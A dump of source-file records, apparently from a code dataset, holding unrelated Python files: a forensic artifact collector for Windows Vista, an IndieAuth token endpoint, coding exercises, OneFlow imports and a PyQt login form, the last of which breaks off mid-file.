hexsha
stringlengths 40
40
| size
int64 6
782k
| ext
stringclasses 7
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
237
| max_stars_repo_name
stringlengths 6
72
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
list | max_stars_count
int64 1
53k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
184
| max_issues_repo_name
stringlengths 6
72
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
list | max_issues_count
int64 1
27.1k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
184
| max_forks_repo_name
stringlengths 6
72
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
list | max_forks_count
int64 1
12.2k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 6
782k
| avg_line_length
float64 2.75
664k
| max_line_length
int64 5
782k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13868f879246c68859ec6c33940fb1a1f22bad69
| 3,395 |
py
|
Python
|
Fastir_Collector/fs/windowsVistaFiles.py
|
Unam3dd/Train-2018-2020
|
afb6ae70fe338cbe55a21b74648d91996b818fa2
|
[
"MIT"
] | 4 |
2021-04-23T15:39:17.000Z
|
2021-12-27T22:53:24.000Z
|
Fastir_Collector/fs/windowsVistaFiles.py
|
Unam3dd/Train-2018-2020
|
afb6ae70fe338cbe55a21b74648d91996b818fa2
|
[
"MIT"
] | null | null | null |
Fastir_Collector/fs/windowsVistaFiles.py
|
Unam3dd/Train-2018-2020
|
afb6ae70fe338cbe55a21b74648d91996b818fa2
|
[
"MIT"
] | 2 |
2021-04-19T08:28:54.000Z
|
2022-01-19T13:23:29.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from fs import _FS
class WindowsVistaFiles(_FS):
    """Artifact collector for Windows Vista and later.

    Thin wrapper around _FS: every method delegates to the parent
    implementation, supplying the Vista+ profile layout paths
    (``\\Users\\...``) for browser histories, prefetch files, Skype/IE
    artifacts and startup items.
    """
    def __init__(self, params):
        super(WindowsVistaFiles, self).__init__(params)
        # Root of the user-profiles directory (e.g. C:\Users), taken from
        # the collector's parameter dict.
        self.userprofile = params['USERPROFILE']
    def _list_named_pipes(self):
        # Consistency fix: this was declared as __list_named_pipes, which
        # Python name-mangles to _WindowsVistaFiles__list_named_pipes; the
        # csv_/json_ wrappers below call self._list_named_pipes(), so the
        # old method was dead code and the parent was hit directly. The
        # single-underscore name matches _list_windows_prefetch and makes
        # the override effective. Behavior is unchanged because the method
        # only delegates to super().
        return super(WindowsVistaFiles, self)._list_named_pipes()
    def _list_windows_prefetch(self):
        # Prefetch enumeration is identical to the generic implementation.
        return super(WindowsVistaFiles, self)._list_windows_prefetch()
    def _chrome_history(self):
        # Vista+ Chrome profile location.
        return super(WindowsVistaFiles, self)._chrome_history(
            '\\Users\\*\\AppData\\Local\\Google\\Chrome\\User Data\\*\\History')
    def _firefox_history(self):
        # Vista+ Firefox default-profile places database.
        return super(WindowsVistaFiles, self)._firefox_history(
            '\\Users\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\places.sqlite')
    def csv_print_list_named_pipes(self):
        super(WindowsVistaFiles, self)._csv_list_named_pipes(self._list_named_pipes())
    def csv_print_list_windows_prefetch(self):
        super(WindowsVistaFiles, self)._csv_windows_prefetch(self._list_windows_prefetch())
    def csv_skype_history(self):
        super(WindowsVistaFiles, self)._skype_history(['AppData\\Roaming\\Skype'])
    def csv_ie_history(self):
        super(WindowsVistaFiles, self)._ie_history(['AppData\\Local\\Microsoft\\Windows\\*\\History.IE5',
                                                    'AppData\\Local\\Microsoft\\Windows\\*\\Low\\History.IE5'])
    def csv_firefox_history(self):
        super(WindowsVistaFiles, self)._csv_firefox_history(self._firefox_history())
    def csv_chrome_history(self):
        super(WindowsVistaFiles, self)._csv_chrome_history(self._chrome_history())
    def csv_firefox_downloads(self):
        super(WindowsVistaFiles, self)._firefox_downloads(
            ['AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\downloads.sqlite'])
    def csv_get_startup_files(self):
        super(WindowsVistaFiles, self)._csv_get_startup_files(
            self.userprofile + '\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*')
    def json_print_list_named_pipes(self):
        super(WindowsVistaFiles, self)._json_list_named_pipes(self._list_named_pipes())
    def json_print_list_windows_prefetch(self):
        super(WindowsVistaFiles, self)._json_windows_prefetch(self._list_windows_prefetch())
    def json_skype_history(self):
        super(WindowsVistaFiles, self)._skype_history(['AppData\\Roaming\\Skype'])
    def json_ie_history(self):
        super(WindowsVistaFiles, self)._ie_history(['AppData\\Local\\Microsoft\\Windows\\*\\History.IE5',
                                                    'AppData\\Local\\Microsoft\\Windows\\*\\Low\\History.IE5'])
    def json_firefox_history(self):
        super(WindowsVistaFiles, self)._json_firefox_history(self._firefox_history())
    def json_chrome_history(self):
        super(WindowsVistaFiles, self)._json_chrome_history(self._chrome_history())
    def json_firefox_downloads(self):
        super(WindowsVistaFiles, self)._firefox_downloads(
            ['AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\downloads.sqlite'])
    def json_get_startup_files(self):
        super(WindowsVistaFiles, self)._json_get_startup_files(
            self.userprofile + '\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*')
| 43.525641 | 111 | 0.697791 |
b9f599563bea1f46bb7c67209476021b9ef4c064
| 68 |
py
|
Python
|
Python/070-Input().py
|
sadikkuzu/HackerRank
|
2b1ed2cf41f6a5404c5b9293186f301b646b5d33
|
[
"Apache-2.0"
] | 5 |
2019-03-09T22:44:01.000Z
|
2021-09-14T00:11:38.000Z
|
Python/070-Input().py
|
jguerra7/HackerRank-4
|
7e1663d0050ffbb0fd885b8affdada9ea13b0e80
|
[
"Apache-2.0"
] | 4 |
2018-08-16T09:39:47.000Z
|
2018-09-14T17:37:07.000Z
|
Python/070-Input().py
|
jguerra7/HackerRank-4
|
7e1663d0050ffbb0fd885b8affdada9ea13b0e80
|
[
"Apache-2.0"
] | 1 |
2020-06-01T23:38:35.000Z
|
2020-06-01T23:38:35.000Z
|
# Python 2 solution: read two ints x and y from the first line, then check
# whether the second line — evaluated as a Python expression by the py2
# built-in input() — equals y.
[x, y] = [int(c) for c in raw_input().split(' ')]
print y == input()
| 34 | 49 | 0.544118 |
4c0967b1d662aca0bb4916d669b727edc68fb383
| 160 |
py
|
Python
|
exercises/ja/exc_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_01_07.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import spacy
# Load the "ja_core_news_sm" model (exercise blank: replace ____)
nlp = ____
text = "公式発表:Appleが米国の上場企業として初めて時価評価額1兆ドルに到達しました。"
# Process the text with the pipeline (exercise blank)
doc = ____
# Print the doc's text (exercise blank)
print(____.____)
| 12.307692 | 50 | 0.76875 |
4c4e52e055f36405d43c1b30f4fe24587419d647
| 8,074 |
py
|
Python
|
publ/tokens.py
|
fluffy-critter/Publ
|
868c5a17c605707dde4d1a95d79405301bd12f05
|
[
"MIT"
] | 6 |
2018-03-29T02:07:44.000Z
|
2018-09-26T00:17:31.000Z
|
publ/tokens.py
|
fluffy-critter/Publ
|
868c5a17c605707dde4d1a95d79405301bd12f05
|
[
"MIT"
] | 82 |
2018-04-01T08:53:59.000Z
|
2018-09-28T23:45:05.000Z
|
publ/tokens.py
|
fluffy-critter/Publ
|
868c5a17c605707dde4d1a95d79405301bd12f05
|
[
"MIT"
] | null | null | null |
""" IndieAuth token endpoint """
import functools
import json
import logging
import time
import typing
import urllib.parse
import arrow
import flask
import itsdangerous
import requests
import werkzeug.exceptions as http_error
from pony import orm
from . import model, utils
from .config import config
# Module-level logger, named after this module per logging convention.
LOGGER = logging.getLogger(__name__)
def signer(context: str):
    """ Gets the signer/validator for the tokens.

    Mixing the app's secret key with a context string ('', 'ticket',
    'refresh_token') yields per-purpose signing keys, so a token issued
    for one context cannot be replayed in another.
    """
    # Imported lazily to avoid a circular import with the app wrapper.
    from .flask_wrapper import current_app
    return itsdangerous.URLSafeSerializer(str(current_app.secret_key) + context)
def get_token(id_url: str, lifetime: int, scope: str = None, context: str = '') -> str:
    """Build and sign a bearer token for *id_url*.

    The signed payload is a ``(claims, expiry)`` pair: the claims always
    carry the canonical identity URL under ``me`` plus, when provided, the
    granted ``scope``; expiry is an absolute unix timestamp *lifetime*
    seconds from now. *context* selects the signing key (see signer()).
    """
    claims = {'me': utils.canonicize_url(id_url)}
    if scope:
        claims['scope'] = scope
    expiry = int(time.time() + lifetime)
    return signer(context).dumps((claims, expiry))
def parse_token(token: str, context: str = '') -> typing.Dict[str, str]:
    """ Parse a bearer token to get the stored data.

    Returns the identity claims dict ({'me': ..., optionally 'scope': ...}).
    Raises 401 Unauthorized for tampered/undecodable tokens and for expired
    ones; in both cases the reason is also stashed on flask.g.token_error
    so post-request hooks can report it.
    """
    try:
        ident, expires = signer(context).loads(token)
    except itsdangerous.BadData as error:
        # Signature mismatch or corrupt payload — never trust the contents.
        LOGGER.error("Got token parse error: %s", error)
        flask.g.token_error = 'Invalid token' # pylint:disable=assigning-non-slot
        raise http_error.Unauthorized('Invalid token') from error
    if expires < time.time():
        LOGGER.info("Got expired token for %s", ident['me'])
        flask.g.token_error = "Token expired" # pylint:disable=assigning-non-slot
        raise http_error.Unauthorized("Token expired")
    return ident
def request(user):
    """ Called whenever an authenticated access fails; marks authentication
    as being upgradeable by setting flask.g.needs_auth.
    Currently this is unused by Publ itself, but a site can make use of it to
    e.g. add a ``WWW-Authenticate`` header or the like in a post-request hook.
    """
    # Only flag the request when there is no authenticated user at all.
    if not user:
        flask.g.needs_auth = True # pylint:disable=assigning-non-slot
def send_auth_ticket(subject: str,
                     resource: str,
                     endpoint: str,
                     scope: str = None):
    """ Initiate the TicketAuth flow.

    Signs a short-lived ticket for *subject* (using the 'ticket' signing
    context) and POSTs it to the subject's ticket *endpoint*, asynchronously.
    """
    from .flask_wrapper import current_app
    def _submit():
        # Runs on a worker thread; any failure is only visible in the log.
        ticket = get_token(subject, config.ticket_lifetime, scope, context='ticket')
        req = requests.post(endpoint, data={
            'ticket': ticket,
            'resource': resource,
            'subject': subject
        })
        LOGGER.info("Auth ticket sent to %s for %s: %d %s",
                    endpoint, subject, req.status_code, req.text)
    # Use the indexer's threadpool to issue the ticket in the background
    current_app.indexer.submit(_submit)
@orm.db_session()
def log_grant(identity: str):
    """ Update the user table with the granted token.

    Records the grant time (and, when one can be fetched, the identity's
    profile) on the KnownUser row for *identity*, creating the row on
    first sight.
    """
    # Imported lazily; only needed on the grant path.
    import authl.handlers.indieauth
    values = {
        'last_token': arrow.utcnow().datetime,
    }
    profile = authl.handlers.indieauth.get_profile(identity)
    if profile:
        values['profile'] = profile
    record = model.KnownUser.get(user=identity)
    if record:
        record.set(**values)
    else:
        # New user: also stamp last_seen at creation time.
        record = model.KnownUser(user=identity,
                                 **values,
                                 last_seen=arrow.utcnow().datetime)
def redeem_grant(grant_type: str, auth_token: str):
    """ Redeem a grant from a provided redemption ticket.

    Verifies *auth_token* against the *grant_type* signing context
    ('ticket' or 'refresh_token'), then returns an OAuth-style JSON
    response carrying a bearer access token plus a refresh token for the
    same identity and scope.
    """
    # parse_token raises 401 on a bad/expired grant.
    grant = parse_token(auth_token, grant_type)
    LOGGER.info("Redeeming %s for %s; scopes=%s", grant_type, grant['me'],
                grant.get('scope'))
    scope = grant.get('scope', '')
    token = get_token(grant['me'], config.token_lifetime, scope)
    response = {
        'access_token': token,
        'token_type': 'Bearer',
        'me': grant['me'],
        'expires_in': config.token_lifetime,
        'refresh_token': get_token(grant['me'],
                                   config.refresh_token_lifetime,
                                   scope,
                                   context='refresh_token')
    }
    if scope:
        response['scope'] = scope
    # Record the successful grant against the known-users table.
    log_grant(grant['me'])
    return json.dumps(response), {'Content-Type': 'application/json'}
@functools.lru_cache()
def get_ticket_endpoint(me_url: str):
    """ Get the IndieAuth Ticket Auth endpoint and the canonical identity URL.

    Fetches *me_url*, resolves any rel="canonical" (HTTP Link header
    first, then a <link> in the page) and discovers the ticket_endpoint
    from whichever URL is authoritative. Results are memoized per URL.
    NOTE(review): lru_cache() here is unbounded and never invalidated, so
    a long-running process keeps stale endpoints — confirm this is intended.
    """
    LOGGER.debug("get_ticket_endpoint %s", me_url)
    import authl.handlers.indieauth
    from bs4 import BeautifulSoup
    # NOTE(review): authl.utils is used below although only
    # authl.handlers.indieauth is imported; this relies on authl exposing
    # utils as an import side effect — confirm.
    req = authl.utils.request_url(me_url)
    content = BeautifulSoup(req.text, 'html.parser')
    if req.links and 'canonical' in req.links:
        canonical_url = req.links['canonical']['url']
    else:
        link = content.find('link', rel='canonical')
        if link:
            # Page-level canonical may be relative; resolve against me_url.
            canonical_url = urllib.parse.urljoin(me_url, link.get('href'))
        else:
            canonical_url = me_url
    if utils.canonicize_url(canonical_url) != utils.canonicize_url(me_url):
        # We have a rel="canonical" which mismatches the provided identity URL
        LOGGER.debug("%s -> canonical=%s", me_url, canonical_url)
        endpoint, me_url = authl.handlers.indieauth.find_endpoint(canonical_url,
                                                                  rel='ticket_endpoint')
    else:
        # Use our fetch to seed Authl's endpoint fetch and get that instead
        endpoints, me_url = authl.handlers.indieauth.find_endpoints(me_url,
                                                                    req.links, content)
        endpoint = endpoints.get('ticket_endpoint')
    LOGGER.debug("%s %s", me_url, endpoint)
    return endpoint, me_url
def ticket_request(me_url: str, scope: str):
    """ Initiate a ticket request for *me_url*, asking for *scope*.

    Returns 202 once the ticket has been queued for background delivery;
    raises 400 when no ticket endpoint can be discovered.
    """
    try:
        endpoint, me_url = get_ticket_endpoint(utils.canonicize_url(me_url))
    except RuntimeError:
        # Discovery failed outright; treated the same as "no endpoint found".
        endpoint = None
    if not endpoint:
        raise http_error.BadRequest("Could not get ticket endpoint")
    LOGGER.info("endpoint: %s", endpoint)
    send_auth_ticket(me_url, flask.request.url_root, endpoint, scope)
    return "Ticket sent", 202
def parse_authorization_header(header):
    """Extract and verify the bearer token from an Authorization header.

    Raises BadRequest for a malformed header or an unsupported auth
    scheme; otherwise returns the parsed token claims.
    """
    parts = header.split()
    if len(parts) < 2:
        raise http_error.BadRequest("Malformed authorization header")
    scheme = parts[0]
    if scheme.lower() != 'bearer':
        raise http_error.BadRequest(f"Unknown authorization type '{scheme}'")
    return parse_token(parts[1])
def indieauth_endpoint():
    """ IndieAuth token endpoint.

    Dispatches on the request contents:
      * form ``grant_type`` ('ticket' / 'refresh_token') -> token issuance
      * form ``action=ticket`` -> provisional ticket request
      * ``Authorization`` header -> token verification (echoes the claims)
      * query arg ``me`` -> ad-hoc ticket request
    Anything else gets a 400.
    """
    if 'grant_type' in flask.request.form:
        # token grant
        if flask.request.form['grant_type'] == 'ticket':
            # TicketAuth
            if 'ticket' not in flask.request.form:
                raise http_error.BadRequest("Missing ticket")
            return redeem_grant('ticket', flask.request.form['ticket'])
        if flask.request.form['grant_type'] == 'refresh_token':
            # Refresh token redemption
            if 'refresh_token' not in flask.request.form:
                raise http_error.BadRequest("Missing refresh_token")
            return redeem_grant('refresh_token', flask.request.form['refresh_token'])
        raise http_error.BadRequest("Unknown grant type")
    if 'action' in flask.request.form:
        # provisional ticket request flow, per https://github.com/indieweb/indieauth/issues/87
        if flask.request.form['action'] == 'ticket' and 'subject' in flask.request.form:
            return ticket_request(flask.request.form['subject'],
                                  flask.request.form.get('scope', ''))
        raise http_error.BadRequest()
    if 'Authorization' in flask.request.headers:
        # ticket verification
        token = parse_authorization_header(flask.request.headers['Authorization'])
        return json.dumps(token), {'Content-Type': 'application/json'}
    if 'me' in flask.request.args:
        # ad-hoc ticket request
        return ticket_request(flask.request.args['me'],
                              flask.request.args.get('scope', ''))
    raise http_error.BadRequest()
| 33.92437 | 94 | 0.630419 |
4c69651efeb7fa6870e433061a12e8cdd6c2e2fc
| 608 |
py
|
Python
|
imgtl/const.py
|
reviforks/imgtl
|
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
|
[
"MIT"
] | null | null | null |
imgtl/const.py
|
reviforks/imgtl
|
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
|
[
"MIT"
] | null | null | null |
imgtl/const.py
|
reviforks/imgtl
|
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*
from collections import OrderedDict
# Template for building absolute img.tl URLs.
BASE_URL = 'https://img.tl/%s'
# SERVERS
# Upload servers; OrderedDict keeps the display order stable.
SERVERS = OrderedDict((
    ('S1', 's1.img.tl'),
    ('S2', 's2.img.tl'),
))
# OBJ_TYPE
# Kinds of uploaded objects.
TYPE_IMAGE = 1
TYPE_FILE = 2
TYPE_TEXT = 3
# EXPIRE_BEHAVIOR
# What happens to an object once it expires.
EXPIRE_BEHAVIORS = (
    'delete',
    'private',
)
# Fallback avatar for users without one.
USER_DEFAULT_ICON = BASE_URL % 'img/user_icon.png'
# Reserved names: usernames that may not be registered, and URL path
# segments reserved for application routes/static assets.
USERNAME_BLACKLIST = ['admin', 'root', 'mail', 'beta', 'test', 'static']
URL_BLACKLIST = ['login', 'signup', 'logout', 'upload', 'img', 'css', 'js', 'fonts']
# Accepted image formats (presumably PIL/Pillow format names — confirm).
AVAILABLE_FORMAT = ['JPEG', 'PNG', 'GIF', 'SVG']
# User ids granted admin rights.
ADMIN_IDS = (1, )
| 18.424242 | 84 | 0.616776 |
d5bdc8662b74e93d4537ef87964eb33ced8a8711
| 366 |
py
|
Python
|
python/en/archive/dropbox/ec2-oregon/lid_core.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/lid_core.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
python/en/archive/dropbox/ec2-oregon/lid_core.py
|
aimldl/coding
|
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
lid_core.py
"""
# Custom package
from utils import makedirs_if_absent
from utils import save2wav
def identify_language(device_id_, sampling_rate_, payload_):
    """Persist the audio payload to a WAV file (language-ID preprocessing stub).

    Bug fix: the body previously referenced undefined globals
    (device_id, SAMPLING_RATE, payload) instead of its own parameters,
    raising NameError on every call; it now uses the arguments it is given.
    """
    file = save2wav(device_id_, sampling_rate_, payload_)
    print('hello')
    # preprocess( payload, SAMPLING_RATE, WINDOW_LENGTH, WINDOW_STEP, NUM_FEATURES )
| 24.4 | 84 | 0.721311 |
e6a5be7ec77a57ca811ac7abe02cbab84ce3bf04
| 1,107 |
py
|
Python
|
python/oneflow/compatible/single_client/layers.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 3,285 |
2020-07-31T05:51:22.000Z
|
2022-03-31T15:20:16.000Z
|
python/oneflow/compatible/single_client/layers.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 2,417 |
2020-07-31T06:28:58.000Z
|
2022-03-31T23:04:14.000Z
|
python/oneflow/compatible/single_client/layers.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 520 |
2020-07-31T05:52:42.000Z
|
2022-03-29T02:38:11.000Z
|
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from oneflow.compatible.single_client.ops.categorical_ordinal_encode_op import (
categorical_ordinal_encoder,
)
from oneflow.compatible.single_client.ops.layers import (
batch_normalization,
batch_normalization_add_relu,
batch_normalization_relu,
conv1d,
conv2d,
conv3d,
dense,
layer_norm,
layer_norm_grad,
layer_norm_param_grad,
)
from oneflow.compatible.single_client.ops.layers import upsample as upsample_2d
from oneflow.compatible.single_client.ops.prelu import prelu
| 33.545455 | 80 | 0.789521 |
e6fadb87ec4f2e48c3ab3d2f8ece993d29a2ec51
| 327 |
py
|
Python
|
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | null | null | null |
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
|
todorkrastev/softuni-software-engineering
|
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
|
[
"MIT"
] | 1 |
2022-02-23T13:03:14.000Z
|
2022-02-23T13:03:14.000Z
|
# Read the tank dimensions (cm) and the already-occupied percentage.
length = int(input())
width = int(input())
height = int(input())
occupied = float(input())
# Full tank volume in cm^3, minus the occupied share.
full_capacity = length * width * height
occupied_total = (occupied / 100) * full_capacity
# Litres of water that still fit (1 litre = 1000 cm^3).
water = (full_capacity - occupied_total) / 1000
print(water)
| 29.727273 | 49 | 0.767584 |
075a93632cbfe8a22160427cf0df0508357d9411
| 6,288 |
py
|
Python
|
Admin/res/signIn.py
|
BlaCkinkGJ/SFSH
|
0134f1e4698ef34caee2d5a8cd875c51507b3527
|
[
"MIT"
] | 1 |
2019-02-28T08:39:55.000Z
|
2019-02-28T08:39:55.000Z
|
Admin/res/signIn.py
|
BlaCkinkGJ/SFSH
|
0134f1e4698ef34caee2d5a8cd875c51507b3527
|
[
"MIT"
] | 5 |
2018-07-17T13:09:34.000Z
|
2018-09-11T13:55:33.000Z
|
Admin/res/signIn.py
|
BlaCkinkGJ/SFSH
|
0134f1e4698ef34caee2d5a8cd875c51507b3527
|
[
"MIT"
] | 2 |
2019-05-17T03:07:08.000Z
|
2022-01-01T07:04:31.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'signIn.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
from res import signUp, status
import pipeline as pipe
from PyQt5.QtWidgets import QMessageBox as msgbox
class Ui_Form(object):
    """pyuic5-generated login form for the worker management system.

    setupUi/retranslateUi were generated from signIn.ui; signInButton and
    signUpButton are hand-wired slots (regenerating the .ui output would
    drop them — see the "changes will be lost" header).
    """
    def setupUi(self, Form):
        """Build the widget tree and connect the two button slots."""
        # Point the shared DB handle at the login-credentials collection.
        pipe.db.changeCollection(pipe.info['loginDB'])
        Form.setObjectName("Form")
        Form.resize(338, 277)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())
        Form.setSizePolicy(sizePolicy)
        self.frame_8 = QtWidgets.QFrame(Form)
        self.frame_8.setGeometry(QtCore.QRect(10, 10, 321, 261))
        self.frame_8.setFrameShape(QtWidgets.QFrame.NoFrame)
        self.frame_8.setFrameShadow(QtWidgets.QFrame.Plain)
        self.frame_8.setLineWidth(19)
        self.frame_8.setMidLineWidth(0)
        self.frame_8.setObjectName("frame_8")
        self.MainLabel = QtWidgets.QLabel(self.frame_8)
        self.MainLabel.setGeometry(QtCore.QRect(30, 10, 261, 51))
        font = QtGui.QFont()
        font.setFamily("나눔스퀘어라운드 ExtraBold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.MainLabel.setFont(font)
        self.MainLabel.setTextFormat(QtCore.Qt.PlainText)
        self.MainLabel.setAlignment(QtCore.Qt.AlignCenter)
        self.MainLabel.setObjectName("MainLabel")
        self.LogInBox = QtWidgets.QGroupBox(self.frame_8)
        self.LogInBox.setGeometry(QtCore.QRect(10, 70, 301, 181))
        font = QtGui.QFont()
        font.setFamily("나눔스퀘어 Bold")
        font.setBold(True)
        font.setWeight(75)
        self.LogInBox.setFont(font)
        self.LogInBox.setObjectName("LogInBox")
        self.layoutWidget_2 = QtWidgets.QWidget(self.LogInBox)
        self.layoutWidget_2.setGeometry(QtCore.QRect(50, 120, 202, 34))
        self.layoutWidget_2.setObjectName("layoutWidget_2")
        self.Button = QtWidgets.QHBoxLayout(self.layoutWidget_2)
        self.Button.setContentsMargins(0, 0, 0, 0)
        self.Button.setObjectName("Button")
        self.SignIn = QtWidgets.QPushButton(self.layoutWidget_2)
        font = QtGui.QFont()
        font.setFamily("나눔스퀘어 Bold")
        font.setPointSize(10)
        font.setBold(False)
        font.setWeight(50)
        self.SignIn.setFont(font)
        self.SignIn.setObjectName("SignIn")
        self.Button.addWidget(self.SignIn)
        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.Button.addItem(spacerItem)
        self.SignUp = QtWidgets.QPushButton(self.layoutWidget_2)
        font = QtGui.QFont()
        font.setFamily("나눔스퀘어 Bold")
        font.setPointSize(10)
        font.setBold(False)
        font.setWeight(50)
        self.SignUp.setFont(font)
        self.SignUp.setObjectName("SignUp")
        self.Button.addWidget(self.SignUp)
        self.Password = QtWidgets.QLabel(self.LogInBox)
        self.Password.setGeometry(QtCore.QRect(30, 80, 81, 16))
        font = QtGui.QFont()
        font.setFamily("나눔스퀘어 Bold")
        font.setPointSize(10)
        font.setBold(False)
        font.setWeight(50)
        self.Password.setFont(font)
        self.Password.setObjectName("Password")
        self.PasswordText = QtWidgets.QLineEdit(self.LogInBox)
        self.PasswordText.setGeometry(QtCore.QRect(140, 80, 113, 21))
        self.PasswordText.setObjectName("PasswordText")
        # Mask the password as it is typed.
        self.PasswordText.setEchoMode(QtWidgets.QLineEdit.Password)
        self.UsernameText = QtWidgets.QLineEdit(self.LogInBox)
        self.UsernameText.setGeometry(QtCore.QRect(140, 40, 113, 21))
        self.UsernameText.setObjectName("UsernameText")
        self.Username = QtWidgets.QLabel(self.LogInBox)
        self.Username.setGeometry(QtCore.QRect(30, 40, 81, 16))
        font = QtGui.QFont()
        font.setFamily("나눔스퀘어 Bold")
        font.setPointSize(10)
        font.setBold(False)
        font.setWeight(50)
        self.Username.setFont(font)
        self.Username.setObjectName("Username")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
        Form.setTabOrder(self.UsernameText, self.PasswordText)
        Form.setTabOrder(self.PasswordText, self.SignIn)
        Form.setTabOrder(self.SignIn, self.SignUp)
        # Hand-added slot wiring (not produced by pyuic5).
        self.SignIn.clicked.connect(self.signInButton)
        self.SignUp.clicked.connect(self.signUpButton)
    def retranslateUi(self, Form):
        """Apply the (Korean) UI strings through Qt's translation layer."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "작업자 통합 관리 시스템"))
        self.MainLabel.setText(_translate("Form", "작업자 통합 관리시스템"))
        self.LogInBox.setTitle(_translate("Form", "Log-in"))
        self.SignIn.setText(_translate("Form", "Sign In"))
        self.SignUp.setText(_translate("Form", "Sign Up"))
        self.Password.setText(_translate("Form", "Password"))
        self.Username.setText(_translate("Form", "Username"))
    def signInButton(self):
        """Check the entered credentials against the DB; open the status window on success."""
        import hashlib
        username = self.UsernameText.text()
        password = self.PasswordText.text()
        # NOTE(review): unsalted SHA-256 of the password; consider a salted
        # KDF (bcrypt/scrypt) for anything beyond a demo.
        password = hashlib.sha256(password.encode()).hexdigest()
        isExist = pipe.db.collection.find_one({'username': username, 'password': password}) is not None
        if isExist:
            # Swap the login window for the status window, then close the old one.
            temp = pipe.window
            pipe.window = QtWidgets.QWidget()
            pipe.ui = status.Ui_Form()
            pipe.ui.setupUi(pipe.window)
            pipe.window.show()
            temp.close()
        else:
            # "Login failed" / "Account not found" message box.
            msgbox.question(pipe.window, '로그인 실패', '계정을 찾을 수 없습니다.', msgbox.Yes, msgbox.Yes)
    def signUpButton(self):
        """Swap the login window for the sign-up window."""
        temp = pipe.window
        pipe.window = QtWidgets.QWidget()
        pipe.ui = signUp.Ui_Form()
        pipe.ui.setupUi(pipe.window)
        pipe.window.show()
        temp.close()
if __name__ == "__main__":
